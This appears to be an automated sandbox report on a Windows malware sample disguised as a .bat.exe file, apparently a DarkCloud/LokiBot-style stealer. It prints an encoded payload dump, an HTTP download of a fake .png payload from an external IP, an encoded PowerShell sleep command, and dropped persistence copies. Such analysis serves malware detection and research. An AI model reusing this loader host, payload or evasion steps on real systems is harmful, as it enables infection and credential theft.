69 6c 48 70 58 6c 67 4e 53 78 65 58 7f 74 67 69 6a 63 70 72 6c 61 66 45 6e 4a 60 53 5c 68 69 6a 69 5b 71 4a 4a 92 79 78 66 68 76 44 7d 69 0f 63 70 72 6c 61 64 53 7a 4e 76 75 74 7c 6a 47 65 03 6d 6c 61 6e 29 7b 09 4d 70 74 70 45 6c 10 50 72 6c 6b 1e 51 7b 73 45 58 52 50 6b 69 0c 57 77 6c 67 e9 42 78 66 69 62 59 55 4f 4c 61 72 5a 6a 61 64 55 61 4b 76 53 52 74 6b 42 64 70 72 6a 1c 60 53 78 62 43 60 09 77 69 6a 67 5b bc 11 63 64 53 7c 4d b0 08 77 76 69 6e 48 ad 58 6c 61 64 50 48 6c 68 63 74 76 69 6a 63 70 72 6e 79 7a 7e 75 40 13 74 74 76 6d 05 45 75 72 6a 4a 67 75 53 97 42 75 74 75 59 60 63 69 72 6c 61 64 53 78 66 6a 69 6f 5b 79 4c 18 71 72 6c 65 0b 74 7d 66 6e 6a 7e 2f 42 69 45 5b 9c 46 61 64 53 7b 56 62 75 65 76 69 6a 63 70 72 6c 63 7c 46 55 6e 4e 0e 77 76 69 6e 48 73 54 47 97 4e 53 78 66 6b 45 7e 76 78 6a 63 70 72 6c 61 64 51 62 7b 45 7d 52 0d 6d 6a 63 74 59 6f 47 4f a5 52 66 68 75 77 46 63 6a 49 70 72 6c 61 64 53 78 64 7e 60 59 6d 4f 69 75 66 5e 74 47 60 4e 60 4b 7d 53 71 78 6d 64 66 7e 74 44 6a 64 53 7e 4d 61 53 5f 95 4f 41 85 56 59 85 4b 64 53 6b 56 63 75 0b 76 69 6a 62 70 72 7d 63 1f 52 78 66 6c 1a 53 73 69 6c 7f 5d 37 4a 63 1f 51 78 66 6c 62 59 48 4f 68 18 71 72 6c 65 67 57 7d 61 7e
                                                                  Data Ascii: "hvtvincprdSfhutvij#prladSxfhutvijcprladSxfhutvijcprladxfh{kgjyMeG<IsIPD:F,:'V\alnwxfhutvi:&pr `gS9qDtvijcprld]YmistvacptladSxfxviJcprLmdSx&huTvijaprhadSxfhupvijcprla_xfjutvijcsr,dShfhetvijspr|adSxfhetvijcprladSTldu#vijcP~l5gSxfhutvijcprladSxfh5xvejcprladSxfhutvijcprladSxfhutvijcprladSxfhutvijcprladsxf`utvijcprlad[Xfh=tvijcprladSVvijylaDSxf~tvkjcprladSxfhutvIjc\0xfh!wvijC|rledSxcutvijcprladSx&hu4XlahSxfh5xvihcprjdSxfhutvijcpr,adxfhutvijcprladSxbytvijc8rlafS}fL~vabpsladSxfhtiwrladSxfhutvijcprladSxfhutvijcprladSxfhutvjZjpeladSxfhcXsFj[|DcdS~M]lvilHpXlgNSxeXtgijcprlafEnJ`S\hiji[qJJyxfhvD}icprladSzNvut|jGemlan){MptpElPrlkQ{sEXRPkiWwlgBxfibYUOLarZjadUaKvSRtkBdprj`SxbC`wijg[cdS|MwvinHXladPHlhctvijcprnyz~u@ttvmEurjJguSButuY`cirladSxfjio[yLqrlet}fnj~/BiE[FadS{Vbuevijcprlc|FUnNwvinHsTGNSxfkE~vxjcprladQb{E}RmjctYoGORfhuwFcjIprladSxd~`YmOiuf^tG`N`K}Sqxmdf~tDjdS~MaS_OAVYKdSkVcuvijbpr}cRxflSsil]7JcQxflbYHOhqrlegW}a~


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.649715185.252.178.6380C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 23, 2022 08:02:01.550542116 CEST5183OUTGET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
                                                                  Host: 185.252.178.63
                                                                  Connection: Keep-Alive
                                                                  Sep 23, 2022 08:02:01.587701082 CEST5184INHTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:02:01 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png
                                                                  Data Raw: 1e 22 f6 68 76 74 76 69 6e 63 70 72 93 9e 64 53 c0 66 68 75 74 76 69 6a 23 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 d3 78 66 68 7b 6b cc 67 6a d7 79 bf 4d d9 65 1f b5 47 3c 1d 1d 05 49 1a 11 1f 15 1e 00 09 73 1b 07 06 1b 1b 02 49 08 06 50 00 19 0f 44 3a 16 46 2c 3a 27 56 04 05 07 15 5c 61 6c 6e 77 78 66 68 75 74 76 69 3a 26 70 72 20 60 67 53 39 71 44 16 74 76 69 6a 63 70 72 6c 81 64 5d 59 6d 69 73 74 76 85 61 63 70 74 6c 61 64 53 78 66 ee 7f 78 76 69 4a 63 70 72 4c 6d 64 53 78 26 68 75 54 76 69 6a 61 70 72 68 61 64 53 78 66 68 75 70 76 69 6a 63 70 72 6c 61 04 5f 78 66 6a 75 74 76 69 6a 63 73 72 2c e4 64 53 68 66 68 65 74 76 69 6a 73 70 72 7c 61 64 53 78 66 68 65 74 76 69 6a 63 70 72 6c 61 64 53 54 6c 64 75 23 76 69 6a 63 50 7e 6c 35 67 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 35 78 76 65 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 73 78 66 60 75 74 76 69 6a 63 70 72 6c 61 64 5b 58 66 68 3d 74 76 69 6a 63 70 72 6c 61 64 53 56 12 0d 0d 00 76 69 6a ef 9a 79 6c 61 44 53 78 66 84 7e 74 76 6b 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 49 6a 63 10 5c 1e 12 16 30 78 66 68 21 77 76 69 6a 43 7c 72 6c 65 64 53 78 88 63 75 74 76 69 6a 63 70 72 6c 61 64 53 78 26 68 75 34 58 1b 0f 0f 1f 11 6c 61 68 53 78 66 68 35 78 76 69 68 63 70 72 9e 6a 64 53 78 66 68 75 74 76 69 6a 63 70 72 2c 61 64 11 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 0e 62 79 74 76 69 6a 63 38 72 6c 61 66 53 7d 66 4c 14 7e 76 61 c3 62 70 73 6c 61 64 53 78 66 68 fd 03 74 69 f6 8a 77 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 6a 5a 6a 70 65 6c 61 64 53 78 66 68 63 58 73 7f 46 6a 5b 7c 44 63 64 53 7e 4d 9c 5d 6c 76 69 6c 48 70 58 6c 67 4e 53 78 65 58 7f 74 67 69 6a 63 70 72 6c 61 66 45 6e 4a 60 53 5c 68 69 6a 69 5b 71 4a 4a 92 79 78 66 68 76 44 7d 69 0f 63 70 72 6c 61 64 53 7a 4e 76 75 74 7c 6a 47 65 03 6d 6c 61 6e 29 7b 09 4d 70 74 70 45 6c 10 50 72 6c 6b 1e 51 7b 73 45 58 52 50 6b 69 0c 57 77 6c 67 e9 42 78 66 69 62 59 55 4f 4c 61 72 5a 6a 61 64 55 61 4b 76 53 52 74 6b 42 64 70 72 6a 1c 60 53 78 62 43 60 09 77 69 6a 67 5b bc 11 63 64 53 7c 4d b0 08 77 76 69 6e 48 ad 58 6c 61 64 50 48 6c 68 63 74 76 69 6a 63 70 72 6e 79 7a 7e 75 40 13 74 74 76 6d 05 45 75 72 6a 4a 67 75 53 97 42 75 74 75 59 60 63 69 72 6c 61 64 53 78 66 6a 69 6f 5b 79 4c 18 71 72 6c 65 0b 74 7d 66 6e 6a 7e 2f 42 69 45 5b 9c 46 61 64 53 7b 56 62 75 65 76 69 6a 63 70 72 6c 63 7c 46 55 6e 4e 0e 77 76 69 6e 48 73 54 47 97 4e 53 78 66 6b 45 7e 76 78 6a 63 70 72 6c 61 64 51 62 7b 45 7d 52 0d 6d 6a 63 74 59 6f 47 4f a5 52 66 68 75 77 46 63 6a 49 70 72 6c 61 64 53 78 64 7e 60 59 6d 4f 69 75 66 5e 74 47 60 4e 60 4b 7d 53 71 78 6d 64 66 7e 74 44 6a 64 53 7e 4d 61 53 5f 95 4f 41 85 56 59 85 4b 64 53 6b 56 63 75 0b 76 69 6a 62 70 72 7d 63 1f 52 78 66 6c 1a 53 73 69 6c 7f 5d 37 4a 63 1f 51 78 66 6c 62 59 48 4f 68 18 71 72 6c 65 67 57 7d 61 7e
                                                                  Data Ascii: "hvtvincprdSfhutvij#prladSxfhutvijcprladSxfhutvijcprladxfh{kgjyMeG<IsIPD:F,:'V\alnwxfhutvi:&pr `gS9qDtvijcprld]YmistvacptladSxfxviJcprLmdSx&huTvijaprhadSxfhupvijcprla_xfjutvijcsr,dShfhetvijspr|adSxfhetvijcprladSTldu#vijcP~l5gSxfhutvijcprladSxfh5xvejcprladSxfhutvijcprladSxfhutvijcprladSxfhutvijcprladsxf`utvijcprlad[Xfh=tvijcprladSVvijylaDSxf~tvkjcprladSxfhutvIjc\0xfh!wvijC|rledSxcutvijcprladSx&hu4XlahSxfh5xvihcprjdSxfhutvijcpr,adxfhutvijcprladSxbytvijc8rlafS}fL~vabpsladSxfhtiwrladSxfhutvijcprladSxfhutvijcprladSxfhutvjZjpeladSxfhcXsFj[|DcdS~M]lvilHpXlgNSxeXtgijcprlafEnJ`S\hiji[qJJyxfhvD}icprladSzNvut|jGemlan){MptpElPrlkQ{sEXRPkiWwlgBxfibYUOLarZjadUaKvSRtkBdprj`SxbC`wijg[cdS|MwvinHXladPHlhctvijcprnyz~u@ttvmEurjJguSButuY`cirladSxfjio[yLqrlet}fnj~/BiE[FadS{Vbuevijcprlc|FUnNwvinHsTGNSxfkE~vxjcprladQb{E}RmjctYoGORfhuwFcjIprladSxd~`YmOiuf^tG`N`K}Sqxmdf~tDjdS~MaS_OAVYKdSkVcuvijbpr}cRxflSsil]7JcQxflbYHOhqrlegW}a~


                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:07:59:49
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\BPL_1000572_007.bat.exe"
                                                                  Imagebase:0x5b0000
                                                                  File size:23552 bytes
                                                                  MD5 hash:4FF4A281A08A0681597794A3024FB584
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:1
                                                                  Start time:08:00:01
                                                                  Start date:23/09/2022
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
                                                                  Imagebase:0x160000
                                                                  File size:430592 bytes
                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:2
                                                                  Start time:08:00:02
                                                                  Start date:23/09/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6da640000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:12
                                                                  Start time:08:01:10
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
                                                                  Imagebase:0x6d0000
                                                                  File size:23040 bytes
                                                                  MD5 hash:386FB639720C77FC29E68682D264423F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:13
                                                                  Start time:08:01:12
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  Imagebase:0xa80000
                                                                  File size:23552 bytes
                                                                  MD5 hash:4FF4A281A08A0681597794A3024FB584
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Visual Basic
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:17
                                                                  Start time:08:01:24
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\AppData\Roaming\note\pdf.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\note\pdf.exe"
                                                                  Imagebase:0xed0000
                                                                  File size:23552 bytes
                                                                  MD5 hash:4FF4A281A08A0681597794A3024FB584
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:20
                                                                  Start time:08:01:35
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\AppData\Roaming\note\pdf.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\note\pdf.exe"
                                                                  Imagebase:0x600000
                                                                  File size:23552 bytes
                                                                  MD5 hash:4FF4A281A08A0681597794A3024FB584
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:21
                                                                  Start time:08:01:40
                                                                  Start date:23/09/2022
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
                                                                  Imagebase:0x1230000
                                                                  File size:434592 bytes
                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:22
                                                                  Start time:08:01:50
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe"
                                                                  Imagebase:0xf60000
                                                                  File size:23552 bytes
                                                                  MD5 hash:4FF4A281A08A0681597794A3024FB584
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  Reputation:low

                                                                  Disassembly

                                                                  No disassembly